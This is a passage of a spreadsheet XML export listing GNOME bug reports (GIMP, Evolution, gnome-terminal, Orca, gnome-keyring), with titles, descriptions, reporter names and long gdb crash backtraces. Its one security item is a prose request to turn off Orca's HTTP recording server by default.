    <t>First-level URLs with trailing slashes don't work</t>
  </si>
  <si>
    <t>Please describe the problem:
While `/module/` works `/module` doesn't.
More than .htaccess needs updating since we grab some info in some py files.
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>dimitris</t>
  </si>
  <si>
    <t>GIMP-125058</t>
  </si>
  <si>
    <t>selection to path button is active despite no images open.</t>
  </si>
  <si>
    <t>Start up the Gimp with no open images open the Paths-Dialog. The
selection to path button is active although the menu entry is not.
Clicking on it produces the warning
(gimp:1913): Gimp-GUI-CRITICAL **: file vectors-commands.c: line 291
(vectors_selection_to_vectors): assertion `GIMP_IS_IMAGE (gimage)' failed</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-645808</t>
  </si>
  <si>
    <t>All settings is too tall</t>
  </si>
  <si>
    <t>Created attachment 184344
Screenshot of the all settings window
When all settings is displayed the window is excessively tall (it seems to be about 778px high). At this height the window is too tall far a large proportion of screen resolutions. The window disappears off the bottom of the screen in these situations.
Additionally the proportions of the window are bad in terms of aesthetics and user experience. The window sits awkwardly in the screen the inability to move it vertically feels constraining.
A screenshot is attached.</t>
  </si>
  <si>
    <t>allanpday</t>
  </si>
  <si>
    <t>LIBGNOME-KEYRING-336893</t>
  </si>
  <si>
    <t>gnome_keyring_get_info_sync</t>
  </si>
  <si>
    <t>Please describe the problem:
gnome_keyring_get_info_sync needs to be switched to use
gnome_keyring_proto_encode_op_string to send the keyring to the daemon
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>ORCA-508777</t>
  </si>
  <si>
    <t>HTTP-based Recording ability should not be enabled by default</t>
  </si>
  <si>
    <t>The assertion mechanism for the Orca test harness relies upon Orca acting as an HTTP server.  The HTTP server listens for recordStart and recordStop posts where all speech and braille output will be recorded after a recordStart is sent and all the output will be returned when a recordStop is sent.
This presents a security risk in that a nefarious application could spy on Orca output.  To help prevent this we should provide settings to allow the HTTP-based record utilities to be turned on/off and the default value should be off.  As part of this the settings file for the test harness should turn the value on.</t>
  </si>
  <si>
    <t>EVOLUTION-247634</t>
  </si>
  <si>
    <t>Evo cannot parse this message</t>
  </si>
  <si>
    <t>I got the attached spam forwarded from the gnome-sysadmin-list.  Evo HEAD
as of 13/Aug/2003 cannot parse it so it gives a Failed on message N in
the send/receive dialog.</t>
  </si>
  <si>
    <t>GNOME-TERMINAL-348655</t>
  </si>
  <si>
    <t>crash on Terminal starting new term after closing old one</t>
  </si>
  <si>
    <t>What were you doing when the app crashed?:
I had just closed one terminal and right-clicked on the desktop and opened another.
Distribution: Gentoo Base System version 1.12.1
Gnome Release: 2.15.4 2006-07-13 (Gentoo)
BugBuddy Version: 2.15.0
Memmory status: size: 291205120 vsize: 291205120 resident: 21614592 share: 9117696 rss: 21614592 rss_rlim: -1
CPU usage: start_time: 1153799062 rtime: 2108 utime: 1933 stime: 175 cutime:22325 cstime: 8950 timeout: 0 it_real_value: 0 frequency: 100
Backtrace was generated from '/usr/bin/gnome-terminal'
Using host libthread_db library /lib/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread 47387414820384 (LWP 9489)]
[New Thread 1082141008 (LWP 9493)]
0x00002b193b6bd92f in __libc_waitpid (pid=23652 stat_loc=0x7fff73fe1bdc options=0) at ../sysdeps/unix/sysv/linux/waitpid.c:41
	in ../sysdeps/unix/sysv/linux/waitpid.c
#0  0x00002b193b6bd92f in __libc_waitpid (pid=23652 stat_loc=0x7fff73fe1bdc options=0) at ../sysdeps/unix/sysv/linux/waitpid.c:41
#1  0x00002b1936d55080 in libgnomeui_segv_handle (signum=5) at gnome-ui-init.c:867
#2  
#3  0x00002b193cd321fc in IA__g_logv (log_domain=0x2b1938f29161 Gtk log_level= format=0x2b193cd5af95 %s: assertion `%s' failed args1=0x7fff73fe24e0) at gmessages.c:493
#4  0x00002b193cd32413 in IA__g_log (log_domain=0x2b193d0c3980  log_level=1023026520 format=0x51 ) at gmessages.c:517
#5  0x00002b1938ef9278 in gtk_widget_real_unrealize (widget=0x5d70e0) at gtkwidget.c:7028
#6  0x00002b193c9be229 in IA__g_closure_invoke (closure=0x5c3f00 return_value=0x0 n_param_values=1 param_values=0x7fff73fe2890 invocation_hint=0x7fff73fe2740) at gclosure.c:490
#7  0x00002b193c9ceab8 in signal_emit_unlocked_R (node=0x5c78a0 detail=0 instance=0x5d70e0 emission_return=0x0 instance_and_params=0x7fff73fe2890) at gsignal.c:2476
#8  0x00002b193c9cfb0b in IA__g_signal_emit_valist (instance=0x5d70e0 signal_id= detail=0 var_args=0x7fff73fe2b10) at gsignal.c:2197
#9  0x00002b193c9cfdc3 in IA__g_signal_emit (instance=0x2b193d0c3980 signal_id=1023026520 detail=81) at gsignal.c:2241
#10 0x00002b1938ef4622 in IA__gtk_widget_unrealize (widget=0x5d70e0) at gtkwidget.c:2540
#11 0x00002b1938ef5dd1 in gtk_widget_dispose (object=0x5d70e0) at gtkwidget.c:6871
#12 0x00002b193c9c0048 in IA__g_object_unref (_object=) at gobject.c:1734
#13 0x00002b1938dd1c87 in IA__gtk_main_do_event (event=0x84eeb0) at gtkmain.c:1433
#14 0x00002b193929ff5c in gdk_event_dispatch (source= callback= user_data=) at gdkevents-x11.c:2320
#15 0x00002b193cd2a2c3 in IA__g_main_context_dispatch (context=0x5805f0) at gmain.c:2043
#16 0x00002b193cd2d10d in g_main_context_iterate (context=0x5805f0 block=1 dispatch=1 self=) at gmain.c:2675
#17 0x00002b193cd2d3f6 in IA__g_main_loop_run (loop=0x581590) at gmain.c:2879
#18 0x00002b1938dd1fe2 in IA__gtk_main () at gtkmain.c:1000
#19 0x000000000041a790 in main (argc=2 argv=0x7fff73fe3108) at terminal.c:1773
Thread 2 (Thread 1082141008 (LWP 9493)):
#0  0x00002b193b6bcb9b in __read_nocancel () from /lib/libpthread.so.0
No symbol table info available.
#1  0x00002b193cd2ae34 in child_watch_helper_thread (data=) at gmain.c:3701
	b = BB '\0'  Ã°\226Ãª&lt;
	list = (GSList *) 0x2b193b6b9af0
#2  0x00002b193cd46044 in g_thread_create_proxy (data=0x7e0310) at gthread.c:553
	__PRETTY_FUNCTION__ = g_thread_create_proxy
#3  0x00002b193b6b70fa in start_thread (arg=) at pthread_create.c:261
	__res = 
	pd = (struct pthread *) 0x40802950
	unwind_buf = {cancel_jmp_buf = {{jmp_buf = {1082141008 -69033239848618443 47387371073648 140735139424496 7 1082142720 -69033240913979483 -69078212028954890} mask_was_saved = 0}} priv = {pad = {0x0 0x0 0x0 0x0} data = {prev = 0x0 cleanup = 0x0 canceltype = 0}}}
	not_first_call = 0
	robust = 
#4  0x00002b193cf586ad in clone () from /lib/libc.so.6
	fstab_state = {fs_fp = 0x0 fs_buffer = 0x0 fs_mntres = {mnt_fsname = 0x0 mnt_dir = 0x0 mnt_type = 0x0 mnt_opts = 0x0 mnt_freq = 0 mnt_passno = 0} fs_ret = {fs_spec = 0x0 fs_file = 0x0 fs_vfstype = 0x0 fs_mntops = 0x0 fs_type = 0x0 fs_freq = 0 fs_passno = 0}}
	__elf_set___libc_subfreeres_element_fstab_free__ = (const void *) 0x2b193cf89180
#5  0x0000000000000000 in ?? ()
No symbol table info available.
Thread 1 (Thread 47387414820384 (LWP 9489)):
#0  0x00002b193b6bd92f in __libc_waitpid (pid=23652 stat_loc=0x7fff73fe1bdc options=0) at ../sysdeps/unix/sysv/linux/waitpid.c:41
	oldtype = 0
	result = 
#1  0x00002b1936d55080 in libgnomeui_segv_handle (signum=5) at gnome-ui-init.c:867
	estatus = 0
	sa = {__sigaction_handler = {sa_handler = 0 sa_sigaction = 0} sa_mask = {__val = {47387391097678 47387371084528 47387391097678 0 0 0 9154128 140735139421120 0 4 140735139421144 4 140733193388032 4294967296 0 5624600}} sa_flags = 5624664 sa_restorer = 0x100000000}
	pid = -512
	in_segv = 1
#2  
No symbol table info available.
#3  0x00002b193cd321fc in IA__g_logv (log_domain=0x2b1938f29161 Gtk log_level= format=0x2b193cd5af95 %s: assertion `%s' failed args1=0x7fff73fe24e0) at gmessages.c:493
	buffer = \000\000\000\000\000\000\000\000\200\234X\000\000\000\000\000Ã p]\000\000\000\000\001\000\000\000\000\000\000\000\000\000\210X '\0'  \210X\000\a\000\000\000Ã±\005\000\000\000\000\000\000\000\027_\000\000\000\000\000`\234X\000\000\000\000\000Â°!Ã¾s\000\000\000\000`\234X\000\000\000\000\000`'Ã¾sÃ¿\177\000\000\000Â®W\000\000\000\000\000\a\000\000\000\000\000\000\000\004\000\000\000\000\000\000\000\004\000\000\000\000\000\000\000\000Â®W\000\000\000\000\000\a\000\000\000\000\000\000\000Â½Ã¾\233 Ã±\006\236&lt;\031+\000\000\000Â®W\000\000\000\000\000P\Ã¾s...
	depth = 
	domain = 
	data = (gpointer) 0x0
	log_func = (GLogFunc) 0x2b193cd32db0 
	domain_fatal_mask = 5
	test_level = G_LOG_FLAG_FATAL
	was_recursion = 0
	i = 
#4  0x00002b193cd32413 in IA__g_log (log_domain=0x2b193d0c3980  log_level=1023026520 format=0x51 ) at gmessages.c:517
	args = {{gp_offset = 40 fp_offset = 48 overflow_arg_area = 0x7fff73fe25c0 reg_save_area = 0x7fff73fe2500}}
#5  0x00002b1938ef9278 in gtk_widget_real_unrealize (widget=0x5d70e0) at gtkwidget.c:7028
No locals.
#6  0x00002b193c9be229 in IA__g_closure_invoke (closure=0x5c3f00 return_value=0x0 n_param_values=1 param_values=0x7fff73fe2890 invocation_hint=0x7fff73fe2740) at gclosure.c:490
	marshal = (GClosureMarshal) 0x2b193c9bc9c0 
	marshal_data = (gpointer) 0xe8
	__PRETTY_FUNCTION__ = IA__g_closure_invoke
#7  0x00002b193c9ceab8 in signal_emit_unlocked_R (node=0x5c78a0 detail=0 instance=0x5d70e0 emission_return=0x0 instance_and_params=0x7fff73fe2890) at gsignal.c:2476
	tmp = 
	handler = 
	accumulator = (SignalAccumulator *) 0x0
	emission = {next = 0x0 instance = 0x5d70e0 ihint = {signal_id = 35 detail = 0 run_type = G_SIGNAL_RUN_LAST} state = EMISSION_RUN chain_type = 6054672}
	class_closure = (GClosure *) 0x5c3f00
	handler_list = (Handler *) 0x0
	return_accu = (GValue *) 0x0
	accu = {g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}}
	signal_id = 35
	max_sequential_handler_number = 1521
	return_value_altered = 0
#8  0x00002b193c9cfb0b in IA__g_signal_emit_valist (instance=0x5d70e0 signal_id= detail=0 var_args=0x7fff73fe2b10) at gsignal.c:2197
	_cvalue = 
	_flags = 
	_vtable = 
	_cvalues = {{v_int = 1946037056 v_long = 140735139425088 v_int64 = 140735139425088 v_double = 6.9532397552613982e-310 v_pointer = 0x7fff73fe2b40} {v_int = 6123744 v_long = 6123744 v_int64 = 6123744 v_double = 3.0255315343264585e-317 v_pointer = 0x5d70e0} {v_int = 0 v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0} {v_int = 1016921539 v_long = 47387391098307 v_int64 = 47387391098307 v_double = 2.3412481987716785e-310 v_pointer = 0x2b193c9cfdc3} {v_int = 32 v_long = 206158430240 v_int64 = 206158430240 v_double = 1.0185579798214317e-312 v_pointer = 0x3000000020} {v_int = 1946037008 v_long = 140735139425040 v_int64 = 140735139425040 v_double = 6.9532397552590266e-310 v_pointer = 0x7fff73fe2b10} {v_int = 1946036816 v_long = 140735139424848 v_int64 = 140735139424848 v_double = 6.9532397552495406e-310 v_pointer = 0x7fff73fe2a50} {v_int = 1016879378 v_long = 47387391056146 v_int64 = 47387391056146 v_double = 2.3412481966886484e-310 v_pointer = 0x2b193c9c5912}}
	_lcopy_format = 
	_n_values = 
	return_value = {g_type = 0 data = {{v_int = 1020546457 v_uint = 1020546457 v_long = 47387394723225 v_ulong = 47387394723225 v_int64 = 47387394723225 v_uint64 = 47387394723225 v_float = 0.0259159077 v_double = 2.3412483778664238e-310 v_pointer = 0x2b193cd44d99} {v_int = 32 v_uint = 32 v_long = 32 v_ulong = 32 v_int64 = 32 v_uint64 = 32 v_float = 4.48415509e-44 v_double = 1.5810100666919889e-322 v_pointer = 0x20}}}
	error = 
	instance_and_params = (GValue *) 0x7fff73fe2890
	stack_values = {{g_type = 6054672 data = {{v_int = 6123744 v_uint = 6123744 v_long = 6123744 v_ulong = 6123744 v_int64 = 6123744 v_uint64 = 6123744 v_float = 8.58119306e-39 v_double = 3.0255315343264585e-317 v_pointer = 0x5d70e0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 8711856 data = {{v_int = 6615040 v_uint = 6615040 v_long = 6615040 v_ulong = 6615040 v_int64 = 6615040 v_uint64 = 6615040 v_float = 9.26964539e-39 v_double = 3.2682640098656795e-317 v_pointer = 0x64f000} {v_int = 1946037184 v_uint = 1946037184 v_long = 140735139425216 v_ulong = 140735139425216 v_int64 = 140735139425216 v_uint64 = 140735139425216 v_float = 4.02749865e+31 v_double = 6.9532397552677222e-310 v_pointer = 0x7fff73fe2bc0}}} {g_type = 47387333230741 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0} {v_int = 5692384 v_uint = 5692384 v_long = 5692384 v_ulong = 5692384 v_int64 = 5692384 v_uint64 = 5692384 v_float = 7.97672896e-39 v_double = 2.8124113773363784e-317 v_pointer = 0x56dbe0}}} {g_type = 140735139424672 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0} {v_int = 684728 v_uint = 684728 v_long = 684728 v_ulong = 684728 v_int64 = 684728 v_uint64 = 684728 v_float = 9.59508295e-40 v_double = 3.3830058154558506e-318 v_pointer = 0xa72b8}}} {g_type = 47387380935377 data = {{v_int = 1946036672 v_uint = 1946036672 v_long = 140735139424704 v_ulong = 140735139424704 v_int64 = 140735139424704 v_uint64 = 140735139424704 v_float = 4.02737486e+31 v_double = 6.953239755242426e-310 v_pointer = 0x7fff73fe29c0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 1 data = {{v_int = 27263007 v_uint = 27263007 v_long = 27263007 v_ulong = 27263007 v_int64 = 27263007 v_uint64 = 27263007 v_float = 5.87748913e-38 v_double = 1.3469715161029425e-316 v_pointer = 0x1a0001f} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 5692384 data = {{v_int = 5962368 v_uint = 5962368 v_long = 5962368 v_ulong = 5962368 v_int64 = 5962368 v_uint64 = 5962368 v_float = 8.35505712e-39 v_double = 2.9458011966631815e-317 v_pointer = 0x5afa80} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 1 data = {{v_int = 224 v_uint = 224 v_long = 224 v_ulong = 224 v_int64 = 224 v_uint64 = 224 v_float = 3.13890856e-43 v_double = 1.1067070466843923e-321 v_pointer = 0xe0} {v_int = 224 v_uint = 224 v_long = 224 v_ulong = 224 v_int64 = 224 v_uint64 = 224 v_float = 3.13890856e-43 v_double = 1.1067070466843923e-321 v_pointer = 0xe0}}} {g_type = 1 data = {{v_int = 6615040 v_uint = 6615040 v_long = 6615040 v_ulong = 6615040 v_int64 = 6615040 v_uint64 = 6615040 v_float = 9.26964539e-39 v_double = 3.2682640098656795e-317 v_pointer = 0x64f000} {v_int = 1016856565 v_uint = 1016856565 v_long = 47387391033333 v_ulong = 47387391033333 v_int64 = 47387391033333 v_uint64 = 47387391033333 v_float = 0.0190429483 v_double = 2.3412481955615364e-310 v_pointer = 0x2b193c9bfff5}}} {g_type = 1 data = {{v_int = 76 v_uint = 76 v_long = 76 v_ulong = 76 v_int64 = 76 v_uint64 = 76 v_float = 1.06498683e-43 v_double = 3.7548989083934737e-322 v_pointer = 0x4c} {v_int = 6615040 v_uint = 6615040 v_long = 6615040 v_ulong = 6615040 v_int64 = 6615040 v_uint64 = 6615040 v_float = 9.26964539e-39 v_double = 3.2682640098656795e-317 v_pointer = 0x64f000}}} {g_type = 5962368 data = {{v_int = 1 v_uint = 1 v_long = 1 v_ulong = 1 v_int64 = 1 v_uint64 = 1 v_float = 1.40129846e-45 v_double = 4.9406564584124654e-324 v_pointer = 0x1} {v_int = 1 v_uint = 1 v_long = 1 v_ulong = 1 v_int64 = 1 v_uint64 = 1 v_float = 1.40129846e-45 v_double = 4.9406564584124654e-324 v_pointer = 0x1}}}}
	free_me = (GValue *) 0x0
	signal_return_type = 4
	param_values = (GValue *) 0x7fff73fe28a8
	node = (SignalNode *) 0x5c78a0
	i = 0
	n_params = 0
	__PRETTY_FUNCTION__ = IA__g_signal_emit_valist
#9  0x00002b193c9cfdc3 in IA__g_signal_emit (instance=0x2b193d0c3980 signal_id=1023026520 detail=81) at gsignal.c:2241
	var_args = {{gp_offset = 24 fp_offset = 48 overflow_arg_area = 0x7fff73fe2bf0 reg_save_area = 0x7fff73fe2b30}}
#10 0x00002b1938ef4622 in IA__gtk_widget_unrealize (widget=0x5d70e0) at gtkwidget.c:2540
	__PRETTY_FUNCTION__ = IA__gtk_widget_unrealize
#11 0x00002b1938ef5dd1 in gtk_widget_dispose (object=0x5d70e0) at gtkwidget.c:6871
	widget = (GtkWidget *) 0x5d70e0
#12 0x00002b193c9c0048 in IA__g_object_unref (_object=) at gobject.c:1734
	object = (GObject *) 0x5d70e0
	old_ref = 
	__PRETTY_FUNCTION__ = IA__g_object_unref
#13 0x00002b1938dd1c87 in IA__gtk_main_do_event (event=0x84eeb0) at gtkmain.c:1433
	event_widget = (GtkWidget *) 0x5d70e0
	grab_widget = (GtkWidget *) 0x5d70e0
	window_group = (GtkWindowGroup *) 0x7e8d40
	next_event = 
	rewritten_event = (GdkEvent *) 0x0
	tmp_list = 
	__PRETTY_FUNCTION__ = IA__gtk_main_do_event
#14 0x00002b193929ff5c in gdk_event_dispatch (source= callback= user_data=) at gdkevents-x11.c:2320
	display = 
	event = (GdkEvent *) 0x84eeb0
#15 0x00002b193cd2a2c3 in IA__g_main_context_dispatch (context=0x5805f0) at gmain.c:2043
No locals.
#16 0x00002b193cd2d10d in g_main_context_iterate (context=0x5805f0 block=1 dispatch=1 self=) at gmain.c:2675
	got_ownership = 
	max_priority = 2147483647
	timeout = 292
	some_ready = 1
	nfds = 
	allocated_nfds = 
	fds = (GPollFD *) 0xa060b0
	__PRETTY_FUNCTION__ = g_main_context_iterate
#17 0x00002b193cd2d3f6 in IA__g_main_loop_run (loop=0x581590) at gmain.c:2879
	got_ownership = 
	self = (GThread *) 0x584710
	__PRETTY_FUNCTION__ = IA__g_main_loop_run
#18 0x00002b1938dd1fe2 in IA__gtk_main () at gtkmain.c:1000
	tmp_list = (GList *) 0x7fff73fe2ff0
	functions = (GList *) 0x0
	init = (GtkInitFunction *) 0x5a2b30
	loop = (GMainLoop *) 0x581590
#19 0x000000000041a790 in main (argc=2 argv=0x7fff73fe3108) at terminal.c:1773
	cwd = 
	err = (GError *) 0x0
	ctx = (poptContext) 0x58ca60
	i = 
	argc_copy = 8
	argv_copy = 
	args = 
	startup_id = 
	display_name = 
	display = 
	reqs = {{required_version = 0x438122 2.0.0 module_info = 0x2b1936e96220} {required_version = 0x0 module_info = 0x0}}
	sm_client = (GnomeClient *) 0x58b810
	results = (OptionParsingResults *) 0x558730
	program = 
	__PRETTY_FUNCTION__ = main
0x00002b193b6bd92f	41	in ../sysdeps/unix/sysv/linux/waitpid.c</t>
  </si>
  <si>
    <t>jdaluz</t>
  </si>
  <si>
    <t>EVOLUTION_EXCHANGE-334900</t>
  </si>
  <si>
    <t>importing complex meeting invitations into Exchange calendar crashes (e_cal_util_remove_instances: assertion `icalcomp != NULL' id == NULL in search_by_id_and_client())</t>
  </si>
  <si>
    <t>When importing a certain ics file (attached) into my Exchange
calender evolution-exchange-storage first reports:
  (evolution-exchange-storage:26540): libecal-CRITICAL **: 
   e_cal_util_remove_instances: assertion `icalcomp != NULL' failed
multiple times then it crashes with a SIGSEGV.
That ics file is was originally created by Outlook but I stripped
personal information from it. It still causes the crash so I hope
you can reproduce it. Please note that it does not crash when importing
into the normal local calender.
In general the calender functionality in combination with Exchange
is not working reliably which is a critical issue for me. This here
is just one example.
I compiled Evolution via Garnome 2.14.0 with -g -O0 on a Suse 9.0
derivative running on x86.
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread 1108151216 (LWP 26752)]
0x41848e48 in _int_free () from /lib/tls/libc.so.6
(gdb) thread apply all bt
Thread 22 (Thread 1108151216 (LWP 26752)):
#0  0x41848e48 in _int_free () from /lib/tls/libc.so.6
#1  0x4184923b in free () from /lib/tls/libc.so.6
#2  0x400d312f in pvl_free (l=0x81b4ab0) at pvl.c:82
#3  0x400bd07c in icalcomponent_free (c=0x8203c50) at icalcomponent.c:242
#4  0x080780f9 in discard_detached_instance (ecomp=0x8630550 rid=
      {year = 2005 month = 7 day = 20 hour = 17 minute = 0 second = 0 is_utc = 0 is_date = 0 is_daylight = 0 zone = 0x0}) at e-cal-backend-exchange.c:625
#5  0x08078300 in e_cal_backend_exchange_modify_object (cbex=0x808e768 comp=0x8479210 mod=CALOBJ_MOD_THIS 
    discard_detached=0) at e-cal-backend-exchange.c:678
#6  0x080711b7 in modify_object_with_href (backend=0x808e768 cal=0x80fd9b0 
    calobj=0x85fdee8 BEGIN:VEVENT\nX-MICROSOFT-CDO-MODPROPS:BEGIN\nX-MICROSOFT-CDO-MODPROPS:dtend\nX-MICROSOFT-CDO-MODPROPS:dtstamp\nX-MICROSOFT-CDO-MODPROPS:dtstart\nX-MICROSOFT-CDO-MODPROPS:END\nX-MICROSOFT-CDO-MODPROPS:recur... mod=CALOBJ_MOD_THIS old_object=0x420d063c new_object=0x420d05fc href=0x0 rid_to_remove=0x0)
    at e-cal-backend-exchange-calendar.c:1370
#7  0x08071991 in receive_objects (backend=0x808e768 cal=0x80fd9b0 
    calobj=0x86bd689 BEGIN:VCALENDAR\nMETHOD:REQUEST\nPRODID:Microsoft CDO for Microsoft Exchange\nVERSION:2.0\nBEGIN:VTIMEZONE\nTZID:GMT +0300 (Standard) / GMT +0400 (Daylight)\nBEGIN:STANDARD\nDTSTART:16010101T030000\nTZOFFSETF...) at e-cal-backend-exchange-calendar.c:1548
#8  0x4004f145 in e_cal_backend_sync_receive_objects (backend=0x808e768 cal=0x80fd9b0 
    calobj=0x86bd689 BEGIN:VCALENDAR\nMETHOD:REQUEST\nPRODID:Microsoft CDO for Microsoft Exchange\nVERSION:2.0\nBEGIN:VTIMEZONE\nTZID:GMT +0300 (Standard) / GMT +0400 (Daylight)\nBEGIN:STANDARD\nDTSTART:16010101T030000\nT---Type  to continue or q  to quit---
ZOFFSETF...) at e-cal-backend-sync.c:344
#9  0x400505c8 in _e_cal_backend_receive_objects (backend=0x808e768 cal=0x80fd9b0 
    calobj=0x86bd689 BEGIN:VCALENDAR\nMETHOD:REQUEST\nPRODID:Microsoft CDO for Microsoft Exchange\nVERSION:2.0\nBEGIN:VTIMEZONE\nTZID:GMT +0300 (Standard) / GMT +0400 (Daylight)\nBEGIN:STANDARD\nDTSTART:16010101T030000\nTZOFFSETF...) at e-cal-backend-sync.c:755
#10 0x40049352 in e_cal_backend_receive_objects (backend=0x808e768 cal=0x80fd9b0 
    calobj=0x86bd689 BEGIN:VCALENDAR\nMETHOD:REQUEST\nPRODID:Microsoft CDO for Microsoft Exchange\nVERSION:2.0\nBEGIN:VTIMEZONE\nTZID:GMT +0300 (Standard) / GMT +0400 (Daylight)\nBEGIN:STANDARD\nDTSTART:16010101T030000\nTZOFFSETF...) at e-cal-backend.c:956
#11 0x40051749 in impl_Cal_receiveObjects (servant=0x80fd9c4 
    calobj=0x86bd689 BEGIN:VCALENDAR\nMETHOD:REQUEST\nPRODID:Microsoft CDO for Microsoft Exchange\nVERSION:2.0\nBEGIN:VTIMEZONE\nTZID:GMT +0300 (Standard) / GMT +0400 (Daylight)\nBEGIN:STANDARD\nDTSTART:16010101T030000\nTZOFFSETF... ev=0x420d0990) at e-data-cal.c:370
#12 0x4004295a in _ORBIT_skel_small_GNOME_Evolution_Calendar_Cal_receiveObjects (_o_servant=0x80fd9c4 
    _o_retval=0x0 _o_args=0x420d0850 _o_ctx=0x420d08c0 _o_ev=0x420d0990 
    _impl_receiveObjects=0x400516f9 ) at Evolution-DataServer-Calendar-common.c:128
#13 0x416b2526 in ORBit_POAObject_invoke (pobj=0x8265118 ret=0x0 args=0x420d0850 ctx=0x420d08c0 
    data=0x420d0928 ev=0x420d0990) at poa.c:1145
#14 0x416b71cf in ORBit_OAObject_invoke (adaptor_obj=0x8265118 ret=0x0 args=0x420d0850 ctx=0x420d08c0 
    data=0x420d0928 ev=0x420d0990) at orbit-adaptor.c:336
#15 0x416a0afd in ORBit_small_invoke_adaptor (adaptor_obj=0x8265118 recv_buffer=0x42533d40 
    m_data=0x4005ea00 data=0x420d0928 ev=0x420d0990) at orbit-small.c:835
#16 0x416b2963 in ORBit_POAObject_handle_request (pobj=0x8265118 opname=0x4253583c receiveObjects 
---Type  to continue or q  to quit---
    ret=0x0 args=0x0 ctx=0x0 recv_buffer=0x42533d40 ev=0x420d0990) at poa.c:1354
#17 0x416b2b50 in ORBit_POAObject_invoke_incoming_request (pobj=0x8265118 recv_buffer=0x42533d40 opt_ev=0x0)
    at poa.c:1422
#18 0x41699eee in giop_thread_queue_process (tdata=0x42500c38) at giop.c:774
#19 0x4169964f in giop_request_handler_thread (data=0x42500c38 user_data=0x0) at giop.c:484
#20 0x417a01b0 in g_thread_pool_thread_proxy (data=0x80aa6d8) at gthreadpool.c:158
#21 0x4179ec75 in g_thread_create_proxy (data=0x4262dcc8) at gthread.c:582
#22 0x4174ba13 in start_thread () from /lib/tls/libpthread.so.0
#23 0x4189e9da in clone () from /lib/tls/libc.so.6
Thread 2 (Thread 1101691824 (LWP 26542)):
#0  0xffffe410 in ?? ()
#1  0x41aa78d8 in ?? ()
#2  0xffffffff in ?? ()
#3  0x00000009 in ?? ()
#4  0x41895804 in poll () from /lib/tls/libc.so.6
#5  0x417818f8 in g_main_context_poll (context=0x80bb3e0 timeout=-1 priority=2147483647 fds=0x80c4ab8 
    n_fds=9) at gmain.c:2849
#6  0x41780ce2 in g_main_context_iterate (context=0x80bb3e0 block=1 dispatch=1 self=0x80b3018)
    at gmain.c:2542
#7  0x417814c8 in IA__g_main_loop_run (loop=0x80b1c18) at gmain.c:2751
#8  0x416bc41a in link_io_thread_fn (data=0x0) at linc.c:394
#9  0x4179ec75 in g_thread_create_proxy (data=0x80b3018) at gthread.c:582
---Type  to continue or q  to quit---
#10 0x4174ba13 in start_thread () from /lib/tls/libpthread.so.0
#11 0x4189e9da in clone () from /lib/tls/libc.so.6
Thread 1 (Thread 1101170336 (LWP 26540)):
#0  0xffffe410 in ?? ()
#1  0xbfff9ce8 in ?? ()
#2  0x41420ca8 in __JCR_LIST__ () from /home/pohly/garnome.aux/lib/libgnutls.so.12
#3  0xbfff9c10 in ?? ()
#4  0x417504d8 in recv () from /lib/tls/libpthread.so.0
#5  0x413b4e41 in _gnutls_read () from /home/pohly/garnome.aux/lib/libgnutls.so.12
#6  0x413b54ef in _gnutls_io_read_buffered () from /home/pohly/garnome.aux/lib/libgnutls.so.12
#7  0x413b2b35 in _gnutls_recv_int () from /home/pohly/garnome.aux/lib/libgnutls.so.12
